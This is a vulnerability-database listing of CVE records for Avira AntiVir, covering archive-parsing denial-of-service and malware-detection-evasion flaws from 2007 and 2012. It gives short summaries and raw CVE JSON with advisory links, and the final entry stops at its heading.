Vulnerabilites related to avira - antivir
cve-2007-2973
Vulnerability from cvelistv5
Published
2007-06-01 01:00
Modified
2024-08-07 13:57
Severity ?
Summary
Avira Antivir Antivirus before 7.03.00.09 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed TAR archive.
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-07T13:57:54.494Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "24239",
                  tags: [
                     "vdb-entry",
                     "x_refsource_BID",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/bid/24239",
               },
               {
                  name: "24187",
                  tags: [
                     "vdb-entry",
                     "x_refsource_BID",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/bid/24187",
               },
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
               },
               {
                  name: "ADV-2007-1971",
                  tags: [
                     "vdb-entry",
                     "x_refsource_VUPEN",
                     "x_transferred",
                  ],
                  url: "http://www.vupen.com/english/advisories/2007/1971",
               },
               {
                  name: "avira-antivir-tar-dos(34557)",
                  tags: [
                     "vdb-entry",
                     "x_refsource_XF",
                     "x_transferred",
                  ],
                  url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34557",
               },
               {
                  name: "25417",
                  tags: [
                     "third-party-advisory",
                     "x_refsource_SECUNIA",
                     "x_transferred",
                  ],
                  url: "http://secunia.com/advisories/25417",
               },
               {
                  name: "36711",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/36711",
               },
               {
                  name: "1018137",
                  tags: [
                     "vdb-entry",
                     "x_refsource_SECTRACK",
                     "x_transferred",
                  ],
                  url: "http://www.securitytracker.com/id?1018137",
               },
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.012%5D%20-%20Avira%20Antivir%20Antivirus%20TAR%20parsing%20Infinite%20Loop%20Advisory.txt",
               },
               {
                  name: "20070530 n.runs-SA-2007.012 - Avira Antivir Antivirus TAR Denial of Service",
                  tags: [
                     "mailing-list",
                     "x_refsource_BUGTRAQ",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/archive/1/470042/100/0/threaded",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2007-05-23T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Avira Antivir Antivirus before 7.03.00.09 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed TAR archive.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2018-10-16T14:57:01",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               name: "24239",
               tags: [
                  "vdb-entry",
                  "x_refsource_BID",
               ],
               url: "http://www.securityfocus.com/bid/24239",
            },
            {
               name: "24187",
               tags: [
                  "vdb-entry",
                  "x_refsource_BID",
               ],
               url: "http://www.securityfocus.com/bid/24187",
            },
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
            },
            {
               name: "ADV-2007-1971",
               tags: [
                  "vdb-entry",
                  "x_refsource_VUPEN",
               ],
               url: "http://www.vupen.com/english/advisories/2007/1971",
            },
            {
               name: "avira-antivir-tar-dos(34557)",
               tags: [
                  "vdb-entry",
                  "x_refsource_XF",
               ],
               url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34557",
            },
            {
               name: "25417",
               tags: [
                  "third-party-advisory",
                  "x_refsource_SECUNIA",
               ],
               url: "http://secunia.com/advisories/25417",
            },
            {
               name: "36711",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/36711",
            },
            {
               name: "1018137",
               tags: [
                  "vdb-entry",
                  "x_refsource_SECTRACK",
               ],
               url: "http://www.securitytracker.com/id?1018137",
            },
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.012%5D%20-%20Avira%20Antivir%20Antivirus%20TAR%20parsing%20Infinite%20Loop%20Advisory.txt",
            },
            {
               name: "20070530 n.runs-SA-2007.012 - Avira Antivir Antivirus TAR Denial of Service",
               tags: [
                  "mailing-list",
                  "x_refsource_BUGTRAQ",
               ],
               url: "http://www.securityfocus.com/archive/1/470042/100/0/threaded",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2007-2973",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Avira Antivir Antivirus before 7.03.00.09 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed TAR archive.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "24239",
                     refsource: "BID",
                     url: "http://www.securityfocus.com/bid/24239",
                  },
                  {
                     name: "24187",
                     refsource: "BID",
                     url: "http://www.securityfocus.com/bid/24187",
                  },
                  {
                     name: "http://forum.antivir-pe.de/thread.php?threadid=22528",
                     refsource: "CONFIRM",
                     url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
                  },
                  {
                     name: "ADV-2007-1971",
                     refsource: "VUPEN",
                     url: "http://www.vupen.com/english/advisories/2007/1971",
                  },
                  {
                     name: "avira-antivir-tar-dos(34557)",
                     refsource: "XF",
                     url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34557",
                  },
                  {
                     name: "25417",
                     refsource: "SECUNIA",
                     url: "http://secunia.com/advisories/25417",
                  },
                  {
                     name: "36711",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/36711",
                  },
                  {
                     name: "1018137",
                     refsource: "SECTRACK",
                     url: "http://www.securitytracker.com/id?1018137",
                  },
                  {
                     name: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.012%5D%20-%20Avira%20Antivir%20Antivirus%20TAR%20parsing%20Infinite%20Loop%20Advisory.txt",
                     refsource: "MISC",
                     url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.012%5D%20-%20Avira%20Antivir%20Antivirus%20TAR%20parsing%20Infinite%20Loop%20Advisory.txt",
                  },
                  {
                     name: "20070530 n.runs-SA-2007.012 - Avira Antivir Antivirus TAR Denial of Service",
                     refsource: "BUGTRAQ",
                     url: "http://www.securityfocus.com/archive/1/470042/100/0/threaded",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2007-2973",
      datePublished: "2007-06-01T01:00:00",
      dateReserved: "2007-05-31T00:00:00",
      dateUpdated: "2024-08-07T13:57:54.494Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2007-1673
Vulnerability from cvelistv5
Published
2007-05-09 01:00
Modified
2024-08-07 13:06
Severity ?
Summary
unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file.
References
http://www.amavis.org/security/asa-2007-2.txtx_refsource_CONFIRM
https://exchange.xforce.ibmcloud.com/vulnerabilities/34080vdb-entry, x_refsource_XF
http://osvdb.org/36208vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/bid/23823vdb-entry, x_refsource_BID
http://secunia.com/advisories/25315third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/archive/1/467646/100/0/threadedmailing-list, x_refsource_BUGTRAQ
http://securityreason.com/securityalert/2680third-party-advisory, x_refsource_SREASON
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-07T13:06:25.976Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "http://www.amavis.org/security/asa-2007-2.txt",
               },
               {
                  name: "multiple-vendor-zoo-dos(34080)",
                  tags: [
                     "vdb-entry",
                     "x_refsource_XF",
                     "x_transferred",
                  ],
                  url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080",
               },
               {
                  name: "36208",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/36208",
               },
               {
                  name: "23823",
                  tags: [
                     "vdb-entry",
                     "x_refsource_BID",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/bid/23823",
               },
               {
                  name: "25315",
                  tags: [
                     "third-party-advisory",
                     "x_refsource_SECUNIA",
                     "x_transferred",
                  ],
                  url: "http://secunia.com/advisories/25315",
               },
               {
                  name: "20070504 Multiple vendors ZOO file decompression infinite loop DoS",
                  tags: [
                     "mailing-list",
                     "x_refsource_BUGTRAQ",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/archive/1/467646/100/0/threaded",
               },
               {
                  name: "2680",
                  tags: [
                     "third-party-advisory",
                     "x_refsource_SREASON",
                     "x_transferred",
                  ],
                  url: "http://securityreason.com/securityalert/2680",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2007-04-07T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2018-10-16T14:57:01",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "http://www.amavis.org/security/asa-2007-2.txt",
            },
            {
               name: "multiple-vendor-zoo-dos(34080)",
               tags: [
                  "vdb-entry",
                  "x_refsource_XF",
               ],
               url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080",
            },
            {
               name: "36208",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/36208",
            },
            {
               name: "23823",
               tags: [
                  "vdb-entry",
                  "x_refsource_BID",
               ],
               url: "http://www.securityfocus.com/bid/23823",
            },
            {
               name: "25315",
               tags: [
                  "third-party-advisory",
                  "x_refsource_SECUNIA",
               ],
               url: "http://secunia.com/advisories/25315",
            },
            {
               name: "20070504 Multiple vendors ZOO file decompression infinite loop DoS",
               tags: [
                  "mailing-list",
                  "x_refsource_BUGTRAQ",
               ],
               url: "http://www.securityfocus.com/archive/1/467646/100/0/threaded",
            },
            {
               name: "2680",
               tags: [
                  "third-party-advisory",
                  "x_refsource_SREASON",
               ],
               url: "http://securityreason.com/securityalert/2680",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2007-1673",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "http://www.amavis.org/security/asa-2007-2.txt",
                     refsource: "CONFIRM",
                     url: "http://www.amavis.org/security/asa-2007-2.txt",
                  },
                  {
                     name: "multiple-vendor-zoo-dos(34080)",
                     refsource: "XF",
                     url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080",
                  },
                  {
                     name: "36208",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/36208",
                  },
                  {
                     name: "23823",
                     refsource: "BID",
                     url: "http://www.securityfocus.com/bid/23823",
                  },
                  {
                     name: "25315",
                     refsource: "SECUNIA",
                     url: "http://secunia.com/advisories/25315",
                  },
                  {
                     name: "20070504 Multiple vendors ZOO file decompression infinite loop DoS",
                     refsource: "BUGTRAQ",
                     url: "http://www.securityfocus.com/archive/1/467646/100/0/threaded",
                  },
                  {
                     name: "2680",
                     refsource: "SREASON",
                     url: "http://securityreason.com/securityalert/2680",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2007-1673",
      datePublished: "2007-05-09T01:00:00",
      dateReserved: "2007-03-24T00:00:00",
      dateUpdated: "2024-08-07T13:06:25.976Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2012-1457
Vulnerability from cvelistv5
Published
2012-03-21 10:00
Modified
2024-08-06 19:01
Severity ?
Summary
The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.
References
http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.htmlvendor-advisory, x_refsource_SUSE
http://osvdb.org/80406vdb-entry, x_refsource_OSVDB
http://osvdb.org/80393vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/archive/1/522005mailing-list, x_refsource_BUGTRAQ
http://osvdb.org/80403vdb-entry, x_refsource_OSVDB
http://osvdb.org/80389vdb-entry, x_refsource_OSVDB
http://osvdb.org/80391vdb-entry, x_refsource_OSVDB
http://osvdb.org/80409vdb-entry, x_refsource_OSVDB
http://osvdb.org/80396vdb-entry, x_refsource_OSVDB
http://osvdb.org/80392vdb-entry, x_refsource_OSVDB
http://www.ieee-security.org/TC/SP2012/program.htmlx_refsource_MISC
http://www.mandriva.com/security/advisories?name=MDVSA-2012:094vendor-advisory, x_refsource_MANDRIVA
http://www.securityfocus.com/bid/52610vdb-entry, x_refsource_BID
http://osvdb.org/80407vdb-entry, x_refsource_OSVDB
http://osvdb.org/80395vdb-entry, x_refsource_OSVDB
https://exchange.xforce.ibmcloud.com/vulnerabilities/74293vdb-entry, x_refsource_XF
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-06T19:01:00.540Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "openSUSE-SU-2012:0833",
                  tags: [
                     "vendor-advisory",
                     "x_refsource_SUSE",
                     "x_transferred",
                  ],
                  url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
               },
               {
                  name: "80406",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80406",
               },
               {
                  name: "80393",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80393",
               },
               {
                  name: "20120319 Evasion attacks expoliting file-parsing vulnerabilities in antivirus products",
                  tags: [
                     "mailing-list",
                     "x_refsource_BUGTRAQ",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/archive/1/522005",
               },
               {
                  name: "80403",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80403",
               },
               {
                  name: "80389",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80389",
               },
               {
                  name: "80391",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80391",
               },
               {
                  name: "80409",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80409",
               },
               {
                  name: "80396",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80396",
               },
               {
                  name: "80392",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80392",
               },
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "http://www.ieee-security.org/TC/SP2012/program.html",
               },
               {
                  name: "MDVSA-2012:094",
                  tags: [
                     "vendor-advisory",
                     "x_refsource_MANDRIVA",
                     "x_transferred",
                  ],
                  url: "http://www.mandriva.com/security/advisories?name=MDVSA-2012:094",
               },
               {
                  name: "52610",
                  tags: [
                     "vdb-entry",
                     "x_refsource_BID",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/bid/52610",
               },
               {
                  name: "80407",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80407",
               },
               {
                  name: "80395",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80395",
               },
               {
                  name: "multiple-av-tar-length-evasion(74293)",
                  tags: [
                     "vdb-entry",
                     "x_refsource_XF",
                     "x_transferred",
                  ],
                  url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/74293",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2012-03-19T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2018-01-17T19:57:01",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               name: "openSUSE-SU-2012:0833",
               tags: [
                  "vendor-advisory",
                  "x_refsource_SUSE",
               ],
               url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
            },
            {
               name: "80406",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80406",
            },
            {
               name: "80393",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80393",
            },
            {
               name: "20120319 Evasion attacks expoliting file-parsing vulnerabilities in antivirus products",
               tags: [
                  "mailing-list",
                  "x_refsource_BUGTRAQ",
               ],
               url: "http://www.securityfocus.com/archive/1/522005",
            },
            {
               name: "80403",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80403",
            },
            {
               name: "80389",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80389",
            },
            {
               name: "80391",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80391",
            },
            {
               name: "80409",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80409",
            },
            {
               name: "80396",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80396",
            },
            {
               name: "80392",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80392",
            },
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "http://www.ieee-security.org/TC/SP2012/program.html",
            },
            {
               name: "MDVSA-2012:094",
               tags: [
                  "vendor-advisory",
                  "x_refsource_MANDRIVA",
               ],
               url: "http://www.mandriva.com/security/advisories?name=MDVSA-2012:094",
            },
            {
               name: "52610",
               tags: [
                  "vdb-entry",
                  "x_refsource_BID",
               ],
               url: "http://www.securityfocus.com/bid/52610",
            },
            {
               name: "80407",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80407",
            },
            {
               name: "80395",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80395",
            },
            {
               name: "multiple-av-tar-length-evasion(74293)",
               tags: [
                  "vdb-entry",
                  "x_refsource_XF",
               ],
               url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/74293",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2012-1457",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "openSUSE-SU-2012:0833",
                     refsource: "SUSE",
                     url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
                  },
                  {
                     name: "80406",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80406",
                  },
                  {
                     name: "80393",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80393",
                  },
                  {
                     name: "20120319 Evasion attacks expoliting file-parsing vulnerabilities in antivirus products",
                     refsource: "BUGTRAQ",
                     url: "http://www.securityfocus.com/archive/1/522005",
                  },
                  {
                     name: "80403",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80403",
                  },
                  {
                     name: "80389",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80389",
                  },
                  {
                     name: "80391",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80391",
                  },
                  {
                     name: "80409",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80409",
                  },
                  {
                     name: "80396",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80396",
                  },
                  {
                     name: "80392",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80392",
                  },
                  {
                     name: "http://www.ieee-security.org/TC/SP2012/program.html",
                     refsource: "MISC",
                     url: "http://www.ieee-security.org/TC/SP2012/program.html",
                  },
                  {
                     name: "MDVSA-2012:094",
                     refsource: "MANDRIVA",
                     url: "http://www.mandriva.com/security/advisories?name=MDVSA-2012:094",
                  },
                  {
                     name: "52610",
                     refsource: "BID",
                     url: "http://www.securityfocus.com/bid/52610",
                  },
                  {
                     name: "80407",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80407",
                  },
                  {
                     name: "80395",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80395",
                  },
                  {
                     name: "multiple-av-tar-length-evasion(74293)",
                     refsource: "XF",
                     url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/74293",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2012-1457",
      datePublished: "2012-03-21T10:00:00",
      dateReserved: "2012-02-29T00:00:00",
      dateUpdated: "2024-08-06T19:01:00.540Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2012-1425
Vulnerability from cvelistv5
Published
2012-03-21 10:00
Modified
2024-08-06 18:53
Severity ?
Summary
